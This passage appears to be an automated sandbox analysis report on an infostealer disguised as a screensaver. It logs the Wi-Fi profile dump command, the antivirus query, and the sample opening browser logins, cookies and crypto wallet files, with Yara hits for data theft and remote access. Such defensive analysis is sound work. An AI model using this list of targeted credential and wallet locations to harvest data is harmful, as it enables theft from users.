Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE1C460 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF73AE1C460
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE36370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 0_2_00007FF73AE36370
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EC48CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW, 68_2_00007FF7F7EC48CC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2041945157.000001CCD86C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2320597036.0000028C88DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 1788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key, type: DROPPED
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxxz
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodusz
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2041945157.000001CCD86C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2320597036.0000028C88DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 1788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key, type: DROPPED
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs